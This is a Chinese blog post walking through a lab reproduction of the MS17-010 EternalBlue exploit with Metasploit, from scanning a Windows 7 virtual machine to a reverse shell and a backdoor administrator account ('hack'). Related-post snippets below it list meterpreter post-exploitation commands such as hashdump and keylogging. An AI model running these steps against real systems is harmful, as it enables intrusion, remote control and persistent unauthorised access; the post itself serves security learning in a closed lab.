2021-04-06-MSF之永恒之蓝

最新推荐文章于 2024-03-11 09:08:20 发布
最新推荐文章于 2024-03-11 09:08:20 发布
阅读量3.5k 收藏 1
点赞数 2
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50963064/article/details/121344210
版权

MSF之ms17-010永恒之蓝漏洞利用

准备

实验环境:

攻击机:虚拟机Kali系统 IP:192.168.216.130
被攻击机:虚拟机win7 x64系统(关闭防火墙) IP:192.168.216.131
攻击工具:Kali自带的msfconsole工具

开始实验

1.进入MSF(可以终端进入也可以搜索在工具栏打开):

终端命令:msfconsole (root权限打开)

2.查找永恒之蓝对应的模块: search ms17-010

c1VZss.md.png

3.利用辅助模块(auxiliary)进行探测信息,扫描发现某网段或IP段内是否存在有此漏洞的主机。

use auxiliary/scanner/smb/smb_ms17_010   //进入模块
show options  //显示所需要设置的参数

c1ZwBn.md.png
yes表示必须设置的参数,这里只需要设置目标地址(RHOSTS)

4.设置目标主机地址:set rhosts 192.168.216.131(这里是我们确定了目标主机,平时不知道可以扫描一段IP地址,如:set rhosts 192.168.216.0/24)

开始扫描:exploit

c1Mm1f.md.png

可以看到显示出192.168.216.131可能存在该漏洞。

5.使用攻击模块进行渗透攻击(第二步时就已经查找出所有相应的模块了):use exploit/windows/smb/ms17_010_eternalblue

查看需要设置的攻击参数信息:show options

c1ljts.md.png

c11wDS.md.png

6.设置目标主机地址:set rhosts 192.168.216.131

7.根据主机类型,查找相应的载荷模块:search windows/x64/shell

c13Ui9.png

8.配置这个载荷模块信息:set payload windows/x64/shell/reverse_tcp(这里攻击会直接进入目标主机的cmd,想要在攻击机界面,使用set payload windows/x64/meterpreter/reverse_tcp)

9.查看配置的参数信息:show options

c1GS1I.md.png

c1GQBT.md.png

10.自己主机的信息,没有显示IP地址,使用set lhosts xx.xx.xx.xx设置。

11.开始攻击: run或exploit

c1JLJH.md.png

可以看到成功拿到了目标主机的shell。

12.进行后门植入(创建新的管理员账户):

net user hack 123456/add  //在Win7上创建一个新用户
net localgroup administrators hack/add  //将hack加入到win7的管理员组,提权

c8LCEd.png

进入win7看看:

net user  //查看win7本地用户
net localgroup administrators  //查看win7本地管理员

c8LA8P.png

可以看到成功了。

emmm_啊嘞啊嘞
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 2万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4188
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
msfconsole中永恒之蓝的操作与应用
最新发布
qq_59020256的博客
03-11 496
help #获取所有可用命令getuid #获取当前权限screenshot #截屏hashdump #获取密码的hashps #获取进程列表sysinfo #获取系统信息route #获取路由表getpid #获取当前攻入的进程pidmigrate #将当前后门注入迁移到其他程序keyscan_start # 开启键盘记录keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe。
msf之ms17-010永恒之蓝漏洞
AI_SumSky的博客
06-27 6390
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之蓝漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 利用search语法查找ms17-010 2.探测主机是否存在漏洞,利用use命令选择第三个测试接口,可探查主机是否存在永恒之蓝漏洞
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3625
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
msf复现永恒之蓝漏洞ms17-010(详解)
m0_72125469的博客
05-18 1245
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
CVE-2021-1732-Exploit:CVE-2021-1732漏洞利用
03-06
CVE-2021-1732-Exploit CVE-2021-1732漏洞利用 仅在Windows10 1909 x64上测试
专题资料(2021-2022年)[3]MSF的接收和发送数据流程韩婷.doc
10-07
教育资料
【渗透测试:MS17_010(永恒之蓝)漏洞复现与分析】
qq_61947585的博客
07-14 1023
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 1435
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
使用msf复现ms17-010永恒之蓝
meditate的博客
03-04 4861
**** 复现永恒之蓝**** 一,准备工作: 1. kali系统: 可以直接装在物理机上,也可以装在VMware虚拟机上。(个人推荐装在虚拟机上) 2. 信息收集工作: 1)获取目标机地址:192.168.1.68 我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。 2)获取攻击机地址:192.168.1.6 这里指kali...
MSF之利用永恒之蓝
m0_51428325的博客
11-21 1081
永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB: SMB(Server Message Block...
Kali MSF(metasploit)永恒之蓝漏洞利用
dbsod007520的博客
05-03 803
Windows7永恒之蓝漏洞利用 1、靶机为win7系统且未即使更新补丁,并且开启了445端口,关闭了防火墙 2、输入msfconsole命令,启动msf 3、搜索漏洞代码,获取攻击模块 search 17-010 //搜索永恒之蓝漏洞代码MS17-010 4、使用第一个辅助模块,设置目标主机IP,执行后显示存在可利用的MS17-010漏洞 setg rhosts 192.168.1.17 //setg为设置全局变量,rhosts是目标主机,此命令表示后续操作中目标主机ip始终为192.168.1
kail环境下msf框架攻击ms17-010(永恒之蓝)漏洞演示
weixin_46447549的博客
04-23 7129
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言前言实验目的实验环境实验步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 前言 MS17-010(永恒之蓝)是一种操作系统漏洞,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Secu.
msf永恒之蓝攻击win10
09-01
根据提供的引用内容,永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统最高权限的攻击方式。然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统的攻击永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。 如果你想在Metasploit Framework中使用永恒之蓝攻击模块对Windows 10进行攻击,你需要使用另外一个模块,如`ms17_010_psexec`或`ms17_010_eternalromance`等。这些模块允许利用永恒之蓝漏洞攻击Windows 10系统。 请注意,进行任何形式的攻击都是非法的,除非你有合法的授权并且在合法和合规的环境中进行。我强烈建议遵守法律和道德准则,避免从事非法活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [经典利用永恒之蓝漏洞对Windows操作系统进行攻击](https://blog.csdn.net/qq_46202048/article/details/121535176)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值